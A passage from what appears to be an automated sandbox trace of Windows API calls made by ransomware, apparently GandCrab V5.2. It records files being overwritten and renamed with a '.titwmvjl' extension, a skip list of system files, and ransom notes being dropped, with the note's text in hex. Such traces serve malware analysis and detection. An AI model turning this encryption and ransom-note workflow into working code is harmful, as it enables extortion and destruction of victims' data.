flProtect=0x4) returned 0x2640000 [0070.397] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.397] ReadFile (in: hFile=0x2e4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e264*=0x1fa, lpOverlapped=0x0) returned 1 [0070.404] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.404] WriteFile (in: hFile=0x2e4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e248*=0x1fa, lpOverlapped=0x0) returned 1 [0070.407] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.407] WriteFile (in: hFile=0x2e4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0070.409] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.412] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.412] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.413] CloseHandle (hObject=0x2e4) returned 1 [0070.414] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.titwmvjl"), dwFlags=0x1) returned 1 [0070.415] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.416] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0070.416] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.416] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.416] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt" [0070.416] lstrlenW (lpString=".titwmvjl") returned 9 [0070.416] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt") returned 121 [0070.416] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.416] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 130 [0070.416] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt") returned 121 [0070.416] lstrlenW (lpString=".txt") returned 4 [0070.416] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.416] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.416] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.416] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.417] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt") returned 121 [0070.417] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\TITWMVJL-DECRYPT.txt") returned 121 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.417] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.417] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.417] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0070.417] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0070.417] CloseHandle (hObject=0x2dc) returned 1 [0070.418] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0070.418] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.418] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.418] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt" [0070.418] lstrlenW (lpString=".titwmvjl") returned 9 [0070.418] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt") returned 117 [0070.418] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.418] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 126 [0070.418] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt") returned 117 [0070.418] lstrlenW (lpString=".txt") returned 4 [0070.418] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.418] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.418] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.418] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.418] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt") returned 117 [0070.418] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\TITWMVJL-DECRYPT.txt") returned 117 [0070.418] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.418] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.418] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.419] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.419] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.419] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.419] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.419] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.419] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.419] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0070.419] FindClose (in: hFindFile=0x503838 | out: hFindFile=0x503838) returned 1 [0070.419] CloseHandle (hObject=0x2d4) returned 1 [0070.419] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.419] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.419] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.420] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt" [0070.420] lstrlenW (lpString=".titwmvjl") returned 9 [0070.420] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt") returned 105 [0070.420] VirtualAlloc (lpAddress=0x0, dwSize=0x112, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.420] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 114 [0070.420] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt") returned 105 [0070.420] lstrlenW (lpString=".txt") returned 4 [0070.420] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.420] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.420] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.420] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.420] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt") returned 105 [0070.420] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\TITWMVJL-DECRYPT.txt") returned 105 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.420] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.420] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.421] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0070.421] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0070.421] CloseHandle (hObject=0x2cc) returned 1 [0070.422] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.422] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.422] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.422] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt" [0070.422] lstrlenW (lpString=".titwmvjl") returned 9 [0070.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt") returned 97 [0070.422] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.422] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 106 [0070.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt") returned 97 [0070.422] lstrlenW (lpString=".txt") returned 4 [0070.422] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.422] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.422] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.422] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt") returned 97 [0070.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\TITWMVJL-DECRYPT.txt") returned 97 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.422] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.422] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.423] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0070.423] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0070.424] CloseHandle (hObject=0x2c4) returned 1 [0070.424] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.424] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.424] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.424] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt" [0070.424] lstrlenW (lpString=".titwmvjl") returned 9 [0070.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 82 [0070.424] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.424] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0070.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 82 [0070.424] lstrlenW (lpString=".txt") returned 4 [0070.424] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.424] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.425] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.425] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 82 [0070.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\TITWMVJL-DECRYPT.txt") returned 82 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.425] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.425] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.425] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0070.425] FindClose (in: hFindFile=0x5034b8 | out: hFindFile=0x5034b8) returned 1 [0070.427] CloseHandle (hObject=0x2bc) returned 1 [0070.427] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.427] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.427] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt" [0070.427] lstrlenW (lpString=".titwmvjl") returned 9 [0070.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt") returned 69 [0070.427] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.427] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 78 [0070.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt") returned 69 [0070.427] lstrlenW (lpString=".txt") returned 4 [0070.427] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.428] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.428] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.428] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt") returned 69 [0070.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\TITWMVJL-DECRYPT.txt") returned 69 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.428] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.428] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.428] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0070.428] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0070.429] CloseHandle (hObject=0x2b4) returned 1 [0070.429] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.429] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0070.430] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0070.430] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft" [0070.430] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\" [0070.430] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.430] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.430] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.430] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.431] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.431] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.431] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.431] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\\\TITWMVJL-DECRYPT.txt") returned 69 [0070.431] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0070.431] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x4